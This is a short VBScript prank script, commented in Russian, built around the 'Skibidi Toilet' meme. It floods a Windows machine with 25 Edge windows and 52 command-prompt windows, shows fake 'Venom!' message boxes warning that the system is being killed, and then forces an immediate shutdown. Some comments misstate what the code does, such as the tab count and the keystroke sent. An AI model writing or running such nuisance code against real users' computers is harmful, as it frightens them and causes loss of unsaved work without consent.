Set shell = CreateObject("WScript.Shell")

' Открываем 20 вкладок в Microsoft Edge с запросом "Skibidi Toilet"
For i = 1 To 25
    shell.Run "msedge.exe https://www.bing.com/search?q=Skibidi+Toilet"
    WScript.Sleep 500 ' Небольшая задержка между открытиями
Next

' Открываем 52 раза командную строку с длинным сообщением
For i = 1 To 52
    shell.Run "cmd.exe /k echo SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET SKIBIDI TOILET"
    WScript.Sleep 100 ' Небольшая задержка между открытиями
Next

' Сворачиваем все окна Microsoft Edge
shell.SendKeys "^%{TAB}" ' Это отправляет комбинацию клавиш Alt + Tab для переключения между окнами
WScript.Sleep 500

' Обратный отсчет на 5 секунд
For i = 5 To 1 Step -1
    MsgBox "System kills " & i & " clicks on OK.", vbExclamation, "Venom!"
    WScript.Sleep 1000 ' Задержка в 1 секунду
Next

' Выключение компьютера
shell.Run "shutdown -s -t 0"